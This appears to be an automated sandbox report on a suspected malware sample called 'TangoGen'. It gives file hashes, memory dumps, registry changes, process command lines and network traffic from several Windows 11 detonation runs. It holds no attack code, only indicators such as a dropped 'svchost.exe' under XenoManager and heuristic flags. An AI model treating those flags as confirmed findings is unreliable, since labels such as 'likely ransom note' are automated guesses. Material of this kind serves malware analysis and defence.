memory/1832-526-0x0000000073ED0000-0x0000000073EEB000-memory.dmp
memory/1832-527-0x0000000073D90000-0x0000000073EC7000-memory.dmp
memory/1832-529-0x0000000073CB0000-0x0000000073CC0000-memory.dmp
memory/1832-528-0x0000000073D70000-0x0000000073D86000-memory.dmp
memory/1832-530-0x0000000073C70000-0x0000000073C92000-memory.dmp
memory/1832-531-0x0000000073B50000-0x0000000073C69000-memory.dmp
memory/1832-532-0x0000000073B10000-0x0000000073B41000-memory.dmp
memory/1832-533-0x0000000073AC0000-0x0000000073ACA000-memory.dmp
memory/1832-534-0x0000000073AA0000-0x0000000073AAA000-memory.dmp
memory/1832-536-0x0000000073A80000-0x0000000073A8D000-memory.dmp
memory/1832-537-0x0000000073A40000-0x0000000073A4A000-memory.dmp
memory/1832-535-0x0000000073A90000-0x0000000073A9C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI42042\setuptools-65.5.0.dist-info\INSTALLER
| MD5 | 365c9bfeb7d89244f2ce01c1de44cb85 |
| SHA1 | d7a03141d5d6b1e88b6b59ef08b6681df212c599 |
| SHA256 | ceebae7b8927a3227e5303cf5e0f1f7b34bb542ad7250ac03fbcde36ec2f1508 |
| SHA512 | d220d322a4053d84130567d626a9f7bb2fb8f0b854da1621f001826dc61b0ed6d3f91793627e6f0ac2ac27aea2b986b6a7a63427f05fe004d8a2adfbdadc13c1 |
C:\Users\Admin\AppData\Local\Tempcsoxvbmjut.db
| MD5 | 42c395b8db48b6ce3d34c301d1eba9d5 |
| SHA1 | b7cfa3de344814bec105391663c0df4a74310996 |
| SHA256 | 5644546ecefc6786c7be5b1a89e935e640963ccd34b130f21baab9370cb9055d |
| SHA512 | 7b9214db96e9bec8745b4161a41c4c0520cdda9950f0cd3f12c7744227a25d639d07c0dd68b552cf1e032181c2e4f8297747f27bad6c7447b0f415a86bd82845 |
C:\Users\Admin\AppData\Local\Tempcswhrverlv.db
| MD5 | 9c31029ee202128d6d60e9b70e600a8f |
| SHA1 | f2aa6248e74f2d78d49de9b47a43afba8d52b7ec |
| SHA256 | af74414cd78d6d5d2ad88785fbb7a52ec6035bbfe0aa95b4171cd7f2f8000176 |
| SHA512 | a34adb87e985687745570cbe1e8622daf84230a6ce9080a230ab553de29e22456455dfa5270ee054da2ff33e2d0b40196dd366e0ed4daaffb707b08c685ac7df |
C:\Users\Admin\AppData\Local\Tempcspqvpnsxn.db
| MD5 | 87210e9e528a4ddb09c6b671937c79c6 |
| SHA1 | 3c75314714619f5b55e25769e0985d497f0062f2 |
| SHA256 | eeb23424586eb7bc62b51b19f1719c6571b71b167f4d63f25984b7f5c5436db1 |
| SHA512 | f8cb8098dc8d478854cddddeac3396bc7b602c4d0449491ecacea7b9106672f36b55b377c724dc6881bee407c6b6c5c3352495ed4b852dd578aa3643a43e37c0 |
C:\Users\Admin\AppData\Roaming\XenoManager\svchost.exe
| MD5 | 7718d23c6ae306151079b534eee6b7f6 |
| SHA1 | 4806ed5d1136df0e2c499192cea7f122164a0028 |
| SHA256 | 701212841c7d28cddc7cc4f4958d7117607a89556bc581a00084981a0e34f265 |
| SHA512 | d84bab8c02367fcfdcdf4d903f54e637cb7cf2bdb46f4b4d68b53ba38e63e5a97097fececf3645ef45ec33341b872a47342b721bcf558a1f7ec0d34f5f6a3a62 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-04-22 14:58
Reported
2024-04-22 15:04
Platform
win11-20240412-en
Max time kernel
91s
Max time network
203s
Command Line
Signatures
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\TangoGen\assets.js
Network
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-04-22 14:58
Reported
2024-04-22 15:04
Platform
win11-20240412-en
Max time kernel
91s
Max time network
204s
Command Line
Signatures
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\TangoGen\instructions.txt
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\TangoGen\instructions.txt
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4424.0.1291794468\557970113" -parentBuildID 20230214051806 -prefsHandle 1768 -prefMapHandle 1760 -prefsLen 22074 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {02445b54-de9e-44bd-85d1-5c701dd21894} 4424 "\\.\pipe\gecko-crash-server-pipe.4424" 1848 24c6f7f6f58 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4424.1.73154367\1275902220" -parentBuildID 20230214051806 -prefsHandle 2360 -prefMapHandle 2348 -prefsLen 22110 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {445ac2ed-8430-4c26-bff4-201da3388704} 4424 "\\.\pipe\gecko-crash-server-pipe.4424" 2372 24c63a8a558 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4424.2.1108614109\1572518470" -childID 1 -isForBrowser -prefsHandle 2936 -prefMapHandle 2932 -prefsLen 22148 -prefMapSize 235121 -jsInitHandle 1352 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {65b503d0-c6eb-4be3-9a91-3ae7906e7664} 4424 "\\.\pipe\gecko-crash-server-pipe.4424" 2948 24c73518958 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4424.3.415470815\890156227" -childID 2 -isForBrowser -prefsHandle 3624 -prefMapHandle 3620 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 1352 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4e744dee-7f57-4da1-9f4c-41509a06f32e} 4424 "\\.\pipe\gecko-crash-server-pipe.4424" 3632 24c7613ef58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4424.4.743175878\1606977717" -childID 3 -isForBrowser -prefsHandle 5036 -prefMapHandle 4404 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 1352 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6735f2ea-1ccc-41cd-85e1-99dbc6931667} 4424 "\\.\pipe\gecko-crash-server-pipe.4424" 5004 24c77d54658 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4424.5.68514212\1219364063" -childID 4 -isForBrowser -prefsHandle 5172 -prefMapHandle 5056 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 1352 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {95ec5628-0abf-431f-ad39-253f23f7333c} 4424 "\\.\pipe\gecko-crash-server-pipe.4424" 5160 24c785a9258 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4424.6.194950423\336006700" -childID 5 -isForBrowser -prefsHandle 5364 -prefMapHandle 5368 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 1352 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f36c08be-e7de-41f9-9f3f-ba69fdec67c7} 4424 "\\.\pipe\gecko-crash-server-pipe.4424" 5356 24c785a9e58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4424.7.341744965\306276511" -childID 6 -isForBrowser -prefsHandle 5896 -prefMapHandle 5892 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 1352 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0ae714d1-253c-4dda-9236-daec983542d7} 4424 "\\.\pipe\gecko-crash-server-pipe.4424" 5904 24c7a17f258 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4424.8.732588754\1133693908" -parentBuildID 20230214051806 -prefsHandle 6164 -prefMapHandle 6160 -prefsLen 27695 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {33c89f88-453f-402a-a9f7-91f050cb5e9e} 4424 "\\.\pipe\gecko-crash-server-pipe.4424" 6176 24c7ab63e58 rdd
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4424.9.1823983917\2029031284" -parentBuildID 20230214051806 -sandboxingKind 1 -prefsHandle 6192 -prefMapHandle 6184 -prefsLen 27695 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f449ece3-a11f-4127-90a0-42f934a101f4} 4424 "\\.\pipe\gecko-crash-server-pipe.4424" 6320 24c7abd7858 utility
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4424.10.1210588212\1395681880" -childID 7 -isForBrowser -prefsHandle 6608 -prefMapHandle 6604 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 1352 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6a7b420f-bc02-499e-8cdb-1a680af05f52} 4424 "\\.\pipe\gecko-crash-server-pipe.4424" 6616 24c7ad23e58 tab
Network
| Country | Destination | Domain | Proto |
| N/A | 127.0.0.1:49727 | tcp | |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | spocs.getpocket.com | udp |
| US | 8.8.8.8:53 | getpocket.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | content-signature-2.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | push.services.mozilla.com | udp |
| US | 8.8.8.8:53 | shavar.services.mozilla.com | udp |
| US | 34.117.188.166:443 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 35.83.153.5:443 | shavar.prod.mozaws.net | tcp |
| US | 34.160.144.191:443 | content-signature-2.cdn.mozilla.net | tcp |
| US | 34.117.237.239:443 | contile.services.mozilla.com | tcp |
| US | 34.120.5.221:443 | prod.pocket.prod.cloudops.mozgcp.net | tcp |
| US | 34.117.188.166:443 | prod.ads.prod.webservices.mozgcp.net | tcp |
| US | 34.107.243.93:443 | autopush.prod.mozaws.net | tcp |
| US | 34.149.100.209:443 | firefox.settings.services.mozilla.com | tcp |
| US | 34.107.243.93:443 | autopush.prod.mozaws.net | tcp |
| N/A | 127.0.0.1:49735 | tcp | |
| GB | 216.58.204.68:443 | www.google.com | tcp |
| GB | 216.58.204.68:443 | www.google.com | udp |
| US | 34.149.100.209:443 | firefox.settings.services.mozilla.com | tcp |
| GB | 142.250.180.22:443 | i.ytimg.com | tcp |
| GB | 142.250.180.22:443 | i.ytimg.com | udp |
| GB | 216.58.212.206:443 | youtube-ui.l.google.com | tcp |
| GB | 142.250.200.2:443 | googleads.g.doubleclick.net | tcp |
| GB | 216.58.212.206:443 | youtube-ui.l.google.com | udp |
| GB | 142.250.200.2:443 | googleads.g.doubleclick.net | udp |
| GB | 142.250.200.6:443 | static.doubleclick.net | tcp |
| GB | 216.58.201.106:443 | jnn-pa.googleapis.com | tcp |
| GB | 216.58.201.106:443 | jnn-pa.googleapis.com | tcp |
| GB | 142.250.200.6:443 | static.doubleclick.net | udp |
| GB | 216.58.201.106:443 | jnn-pa.googleapis.com | udp |
| GB | 216.58.201.106:443 | jnn-pa.googleapis.com | udp |
| GB | 142.250.178.14:443 | youtube-ui.l.google.com | tcp |
| GB | 142.250.178.14:443 | youtube-ui.l.google.com | tcp |
| GB | 142.250.178.14:443 | youtube-ui.l.google.com | tcp |
| GB | 142.250.178.14:443 | youtube-ui.l.google.com | tcp |
| GB | 142.250.178.14:443 | youtube-ui.l.google.com | udp |
Files
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ta9v328x.default-release\activity-stream.discovery_stream.json.tmp
| MD5 | 76cdf555bd6571bce660d722c87889e7 |
| SHA1 | dace01c91deac69de2c37282fd0ead8eb0562932 |
| SHA256 | a6365e231c733480137711149158f8ddebaade47e2e7b5a600e7124c6e6fb655 |
| SHA512 | 5c54898143c5cdc6431990acf783bfd90453f80b71064376124d309d099878dd9aed1776b76857f0dbdea979a12ce940579f98a795bd56ef86b47fe8de8fcdc5 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ta9v328x.default-release\prefs.js
| MD5 | 0fe9ac5e645cfea2b430a730da3b6276 |
| SHA1 | 07adcd09b97b5b9cc7f24cd4430090387c0dfd5e |
| SHA256 | 05add04c82b46e8ae86ad7afc31956451c9b9e483621288a3b081be4a7ea6a4c |
| SHA512 | 1d1ee6fa1d8720775f1f9d0014a020e3dab707c7939f0be8b86b775fe45c14b2c418ace877d5fecadd0ceccee359928967f3d232df23bee523ebfdc29c631dcb |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ta9v328x.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 723e63d49e6d6b1f94748292ec2c6ffe |
| SHA1 | 4f9dc7a1e71521b77a4ac8c30b0a5b4a6852b06c |
| SHA256 | e94f17d3cea1ca52da9a95e964ab411e67bb81441d27dbeff6eab46657c384cd |
| SHA512 | 5b5713696cf091f397c683a962789a63a2bfe0e5b1d60a47ac0fdae18fe123fd685f2b3323052dc1ec3d35f6f15acbf6146d0f963d1096b1abe720caafdf2c9e |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ta9v328x.default-release\cache2\doomed\27740
| MD5 | 4a929b146028932a2695680d389f73d8 |
| SHA1 | ca7554b1f9d8055abe575ecc8857c81b0aecea3f |
| SHA256 | 445bae41804f4cb1706528d2da29631cfecd4bb934370eb09540e98fb5872836 |
| SHA512 | 56900620ca6f182583b5cad8907d2ba9b8c4dab623537de7ae5ae822856cdd95c8be2803a81bf6070fa3144a4c79dc9861e29eb5645e7b28f3c65a4e6e2cf851 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ta9v328x.default-release\cache2\doomed\26868
| MD5 | 579aeecfaafdb4a71682513c4c3bdffc |
| SHA1 | 6837ff6f301330314f18ed55b253c7bc070a669c |
| SHA256 | 9f8db2c9d6f3ec4f6782a31ee6676ea9e82540951074e1f16632a37898c17d31 |
| SHA512 | 61fb1a4aff25481b9804df8f640b398bf3dc6ee5fe8bfdb00bd1a00fa173df09677ad56bd38db39b1a4992060e0eea560767624707ad924dd317550f919cf824 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ta9v328x.default-release\cache2\doomed\21300
| MD5 | 71d42f771cde3d7d2a78ed04644b218a |
| SHA1 | 57fe38b9f96b54f928c331b503bcbd8da85e6f01 |
| SHA256 | 1fc229e5c16791e2af2e47ddd7bf779fafdbf5d4c5e56bd128b58fc06543f79f |
| SHA512 | e751f7cdde5cf541e96d8c3b87ac94ab6748d154722c2beb3c404f6b346acc7d373af29be4e9e19804ddf564e996faefba88dba0db9e8c38c1dc828647a4a179 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ta9v328x.default-release\cache2\doomed\1463
| MD5 | d574874fbdd70859840a025a2382c564 |
| SHA1 | 3b70944a8250bff24d275fa6f940063fb6a93e0d |
| SHA256 | c781cf0f3dcad61fddc17edb10645997cc8409b9ca6f03e6ae953888fe960eb8 |
| SHA512 | 405a0f3e8f9f3bc26f29d11b04097f8a6fd0a2ea9b74254b65d5d6510dac460c90342d78d2c06cce4b7fbc623fcf8f8195619fba63ce3684b2f194c74264af06 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ta9v328x.default-release\prefs.js
| MD5 | 35f77f68d67796bf170d7e594bd7e126 |
| SHA1 | 4bcecdbcaf74f08ba07aca62e7a92a6d1a1233ed |
| SHA256 | 03cb3067d4ada4c087a8144838fb4de6d7967234dcd64533979a01a141a6e223 |
| SHA512 | 62b5719295b7e56e09930b4e5d1c7e421e6f23d6c354b2d1931b80be475547902e0984f360a946fa63a137add48ef92527b2a2f74abf2bd7120db9b0aaabe4d8 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ta9v328x.default-release\sessionstore.jsonlz4
| MD5 | 3bb13dbf75eb105585c97b8dd3eb565a |
| SHA1 | 49b5dac80d6501b8ce652c52a3199c4a678b554d |
| SHA256 | 38cfa200ffb46caabf74f4e40e217d99e4c1961cf2699b0efd3f19419b42e2ef |
| SHA512 | 7199bbb8726c05e7b72c83c3fad27f06999ea4e8b41e968ca3ecab1eef8a984d78a68d737f7bd1b2a3ed84b920dfd8ce352dafe1636d182bff33a9f0d0afc56e |
Analysis: behavioral5
Detonation Overview
Submitted
2024-04-22 14:58
Reported
2024-04-22 15:04
Platform
win11-20240412-en
Max time kernel
149s
Max time network
273s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-834482027-582050234-2368284635-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-834482027-582050234-2368284635-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2448 wrote to memory of 4460 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\NOTEPAD.EXE |
| PID 2448 wrote to memory of 4460 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\NOTEPAD.EXE |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\TangoGen\license.txt
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\TangoGen\license.txt
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
Network
| Country | Destination | Domain | Proto |
| NL | 52.111.243.29:443 | tcp | |
| US | 8.8.8.8:53 | browser.pipe.aria.microsoft.com | udp |
| GB | 104.86.110.114:443 | tcp | |
| IE | 13.69.239.74:443 | browser.pipe.aria.microsoft.com | tcp |
| NL | 23.62.61.185:443 | r.bing.com | tcp |
| NL | 23.62.61.185:443 | r.bing.com | tcp |
| NL | 23.62.61.185:443 | r.bing.com | tcp |
| NL | 23.62.61.185:443 | r.bing.com | tcp |
| NL | 23.62.61.185:443 | r.bing.com | tcp |
| NL | 23.62.61.185:443 | r.bing.com | tcp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| BE | 104.68.66.114:443 | cxcs.microsoft.net | tcp |
| NL | 23.62.61.146:443 | www.bing.com | tcp |
Files
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
| MD5 | e8197e68deaabec1caac808d8a1b1202 |
| SHA1 | 3b706ac97224e95f5db57eb60acf067ccf2d4c95 |
| SHA256 | 89d5da8ae7c25fce8f1b74b2a02f4cb9d524dac5b752b35e511d399259a26d66 |
| SHA512 | 609e6013c4683519b1d7448c2417ec3f528a0764f1ae9c9cedc213ceec2df497c187164e7b713e4a78236e17f6fc9680630551a7fec98c2432e308a48b8e66e0 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-22 14:58
Reported
2024-04-22 15:04
Platform
win11-20240412-en
Max time kernel
212s
Max time network
302s
Command Line
Signatures
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-834482027-582050234-2368284635-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-834482027-582050234-2368284635-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-834482027-582050234-2368284635-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-834482027-582050234-2368284635-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\TangoGen.rar
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "C:\Users\Admin\AppData\Local\Temp\TangoGen.rar"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url C:\Users\Admin\AppData\Local\Temp\TangoGen.rar
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1848.0.1912472413\899983855" -parentBuildID 20230214051806 -prefsHandle 1804 -prefMapHandle 1788 -prefsLen 22074 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3db466d9-8a9d-45ef-b0ed-b4c44445c2b2} 1848 "\\.\pipe\gecko-crash-server-pipe.1848" 1896 1a29f013b58 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1848.1.1205956817\139048220" -parentBuildID 20230214051806 -prefsHandle 2432 -prefMapHandle 2428 -prefsLen 22925 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {73ddbaa5-f518-49f8-baf5-4a9e87166a56} 1848 "\\.\pipe\gecko-crash-server-pipe.1848" 2440 1a28ae85458 socket
C:\Program Files\Mozilla Firefox\firefox.exe
